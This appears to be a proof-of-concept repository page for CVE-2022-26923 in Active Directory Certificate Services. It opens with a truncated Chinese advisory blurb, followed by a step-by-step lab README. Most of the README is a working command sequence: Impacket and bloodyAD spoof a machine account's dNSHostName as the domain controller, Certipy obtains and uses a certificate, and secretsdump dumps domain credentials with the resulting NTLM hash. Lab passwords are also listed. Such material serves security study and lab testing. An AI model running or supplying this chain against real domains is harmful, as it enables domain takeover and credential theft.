Microsoft Windows Active Directory 信任管理问题漏洞
描述:Microsoft Windows Active Directory是美国微软(Microsoft)公司的一个负责架构中大型网络环境的集中式目录管理服务。存储有关网络上对象的信息,并使管理员和用户可以轻松查找和使用这些信息。 Microsoft Windows Active Directory存在信任管理问题漏洞。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Syst
Exploitation for CVE-2022-26923
# Exploiting CVE-2022-26923: Certificate Authority Privilege Escalation
## Overview
CVE-2022-26923 is a vulnerability in Active Directory Certificate Services (AD CS) that allows an attacker to escalate privileges by misusing certificate-based authentication. This guide outlines the steps to exploit this vulnerability using Impacket and Certipy.
## Credentials Table
| Virtual Machine | Username | Password |
| Windows Server | Administrator | !@windowsadmintest101 |
| Windows Server | testuser | $Vulnerable139 |
| Kali-Linux VM | vagrant | vagrant |
## Step 1: Clone the Repository and Set Up Virtual Machines
First, clone the repository containing the necessary files:
git clone https://github.com/rayngnpc/CVE-2022-26923-rayng.git
cd CVE-2022-26923-rayng
### Set Up Virtual Machines
The repository contains two folders, each with a `Vagrantfile` for provisioning virtual machines. You must install **Vagrant** on your host machine before proceeding.
#### **Install Vagrant**
##### **For Windows**
Download and install Vagrant from [here](https://www.vagrantup.com/downloads).
Or install using PowerShell:
choco install vagrant
##### **For Linux**
sudo apt update && sudo apt install vagrant -y
#### **Windows Server 2022 VM**
Navigate to the `WindowsServer2022` directory:
cd WindowsServer2022
vagrant up
This will download and set up the Windows Server 2022 VM in VirtualBox.
#### **Kali Linux VM**
Navigate to the `Kali-LinuxVM` directory:
cd Kali-LinuxVM
vagrant up
## Step 2: Configure the Virtual Network
Since the exploit requires a NAT network, configure VirtualBox as follows:
### **On Windows**
Before running the command below, ensure `VBoxManage` is added to your environment variables. If not, execute the command using its full path:
#### **Adding NAT Network**
VBoxManage natnetwork add --netname NatNet1 --network "" --enable
If `VBoxManage` is not recognized, use:
"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" natnetwork add --netname NatNet1 --network "" --enable
### **On Linux**
VBoxManage natnetwork add --netname NatNet1 --network "" --enable
Make sure to check both VMs in VirtualBox and ensure they are assigned to the network adapter NatNetwork - NatNet1.
You can create a NAT network with a different name, but it must be in the IP range
## Step 3: Modify Hosts File
Before proceeding, ensure both the **Windows Server 2022** and **Kali Linux VM** are turned on.
Access the Kali Linux VM to start the attack.
Update your `/etc/hosts` file to map the domain controller's IP:
sudo nano /etc/hosts
Add the following entry:
``` SERVER2022.pchau.domain.local SERVER2022 pchau-SERVER2022-CA pchau.domain.local
Save and exit.
## Step 4: Set Up the Environment
Navigate to the `CVE-26923` directory and activate the Python virtual environment:
cd ~/CVE-26923
source ~/CVE-26923/rayng/bin/activate
## Step 5: Add a Computer to the Domain
Using Impacket's `addcomputer` utility:
impacket-addcomputer -computer-name 'PCTEST1' -computer-pass 'testuser' -dc-host -domain-netbios pchau.domain.local pchau.domain.local/testuser:'$Vulnerable139'
## Step 6: Assign PCTEST1 to the Domain Controller
### **Method 1: Using SSH** (if OpenSSH is installed on the target server)
ssh testuser@
Get-ADComputer PCTEST1 -properties dnshostname,serviceprincipalname
Set-ADComputer PCTEST1 -DnsHostName SERVER2022.pchau.domain.local
Get-ADComputer PCTEST1 -properties dnshostname,serviceprincipalname
### **Method 2: Without SSH** (using Impacket & BloodyAD)
Check domain computers:
impacket-GetADComputers pchau.domain.local/testuser:'$Vulnerable139' -dc-ip
Navigate to the `bloodyAD` directory and use `bloodyAD.py` to add `PCTEST1` to the domain:
cd ~/CVE-26923/bloodyAD/
python3 bloodyAD.py -d pchau.domain.local -u testuser -p '$Vulnerable139' --host set object PCTEST1$ dNSHostName -v 'SERVER2022.pchau.domain.local'
Verify that `PCTEST1` has been assigned to the domain:
impacket-GetADComputers pchau.domain.local/testuser:'$Vulnerable139' -dc-ip
## Step 7: Exploitation Process
### **Finding Vulnerable Certificates**
Use Certipy to find vulnerable certificates:
certipy find -dc-ip -username 'PCTEST1$' -password 'testuser'
### **Requesting a Certificate**
Request a machine certificate using Certipy:
certipy req -dc-ip -username 'PCTEST1$' -password 'testuser' -template Machine -ca pchau-SERVER2022-CA
### **Authenticating with the Certificate**
Authenticate using the obtained certificate:
certipy auth -pfx server2022.pfx
## Step 8: Extracting NTLM Hashes
After running the `certipy auth` command, two hashes will be displayed. The right-side hash will be used for NTLM authentication.
Example hash output:
Use the extracted NTLM hash for dumping credentials:
impacket-secretsdump 'server2022$@pchau.domain.local' -hashes :69079fd4946af567d682d61e121f29e7
This completes the full attack chain for exploiting CVE-2022-26923.
[4.0K] /data/pocs/04a9b48ffb1dfc0f1b55b18d1c9e3f103b816bb9
├── [4.0K] Kali-LinuxVM
│ └── [ 266] Vagrantfile
├── [5.4K] README.md
└── [4.0K] WindowsServer2022
└── [ 277] Vagrantfile
2 directories, 3 files
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